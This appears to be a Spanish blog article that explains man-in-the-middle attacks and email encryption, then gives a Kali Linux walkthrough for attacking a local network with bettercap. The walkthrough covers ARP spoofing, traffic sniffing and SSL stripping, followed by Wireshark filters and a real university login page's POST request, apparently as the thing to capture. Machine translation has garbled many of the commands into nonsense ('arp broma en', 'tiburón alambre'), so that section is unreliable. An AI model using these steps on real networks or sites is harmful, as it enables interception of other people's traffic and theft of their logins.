ataque de MITM por las siglas en ingles (El hombre en el medio), consiste en intervenir en la comunicación entre dos partes, sin que estas puedan percatarse de la intrusión, pudiendo localizarse física o lógicamente al atacante. un tipo de ataque MITM compromete principalmente las siguientes funciones de seguridad:
- confidencialidad: Al escuchar la comunicación entre dos personas o equipos.
- Integridad: interceptando la comunicación y modificando la información.
- Disponibilidad: redirigiendo o destruyendo mensajes de tal manera que provoquen la interrupción de la comunicación entre dos partes comunicantes.
Para contribuir a la comprensión de este tipo de ataque, supongamos el siguiente escenario donde se comprometen la confidencialidad, la integridad y la disponibilidad:
Entre dos integrantes de la empresa se enviará un archivo vía correo electrónico, existe un tercero (intruso) que durante la conversación sin ser detectado escuchó la hora en que se realizará el intercambio electrónico, afectando confidencialidad De esta forma, el atacante interceptará la comunicación durante la transferencia del archivo y modificará el documento, dañándolo. lo completo de tal forma que cuando el destinatario lo reciba, no notará el cambio; Finalmente, si el atacante destruye la información obtenida durante la interceptación, esta ya no llegará al destinatario, lo que provocará una interrupción de la comunicación y, por lo tanto, afectará Disponibilidad.
Como medidas preventivas para este tipo de ataques, se recomienda a los usuarios el uso de claves públicas para el cifrado, cifrado de información, uso de certificados y firmas digitales.
Debido a la importancia que ha cobrado en la actualidad el uso del correo electrónico, para el intercambio de información, por ser una herramienta de comunicación rápida, económica, directa y personalizada; se ha convertido en el blanco de amenazas que amenazan la seguridad de esta herramienta de comunicación. De esta forma, aparece como medida de seguridad contra los intrusos el uso del correo electrónico encriptado, que consiste en utilizar un algoritmo de encriptación para convertir el mensaje en una representación ininteligible para una persona que no está autorizada a recibir la información.
Entre los mecanismos más utilizados hoy en día para el cifrado de correo electrónico se encuentran: PGP y S/MIMEque se describen en detalle al final del artículo.
Se deben considerar los siguientes aspectos para la selección adecuada de un algoritmo de cifrado de correo electrónico:
- Él valor informativo para la organización (teniendo en cuenta el impacto que causaría la divulgación, pérdida o alteración no autorizada), ya que el intercambio de información altamente confidencial requerirá de un algoritmo de encriptación riguroso para protegerla.
- Él información de valor de tiempoes la información la que gana valor durante un cierto período de tiempo (se pueden usar contraseñas que se cambian regularmente y tamaños de clave más pequeños para protegerlas).
- Él riesgo de amenaza Para información, es decir, información que tiene mayor exposición a una fuente comprometida, lo que implica un alto nivel de riesgo, se recomienda utilizar un método de cifrado robusto.
- En una relación con infraestructurase debe tener en cuenta que el correo electrónico encriptado requiere más ancho de banda, lo cual depende del algoritmo de encriptación utilizado, la cantidad de destinatarios, el tamaño de la clave y el mensaje.
De esta forma, el cifrado del correo electrónico se convierte en una alternativa como mecanismo de protección que ayudará a reducir el riesgo de daño frente a las amenazas a las que puede estar expuesta toda la información que se intercambia diariamente a través del correo electrónico. Además, es necesario que los usuarios de este medio de comunicación conozcan los mecanismos disponibles que contribuyan al fortalecimiento de las medidas de seguridad implementadas para proteger sus datos, ya que la seguridad es responsabilidad de cada usuario individual que utiliza las nuevas tecnologías de comunicación.
¿Cómo atacar una red local?
Para realizar el ataque, primero debe acceder a Kali Linux, ya sea en modo vivo o de instalación
Comandos de videotutoriales
bash sudo
apt-get install compilación-esencial ruby-dev libcap-dev
actualización conveniente
apt-get install bettercap
ebettercap –versión
bateador
Por favor ayuda
MONITOREO DE CONEXIÓN
sonda de red activada
mapa en
SNIFFING (páginas que ingresas)
establecer arp.spoof.targets(dirección IP) //opcional
arp broma en
establecer net.sniff.verbose falso
net. para olfatear
USO DEL NAVEGADOR
establezca http.proxy.sslstrip en verdadero
establecer net.sniff.verbose falso
arp broma en
http.proxy habilitado
net. para olfatear
ATRAPA EL TRÁFICO
bash sudo
tiburón alambre
EJEMPLO DE FILTRO DE TRÁFICO EN WIRESHARK
puerto de origen – des port
tpc-udp(53)-dns
puerto tcp == 443
tcp.dstport== 443
tcp.puerto == 443 || udp.puerto == 443
http://cvirtual.itm.edu.co/login/index.php
http
POST /login/index.php
Guía:
¡Haz clic para calificar este listado!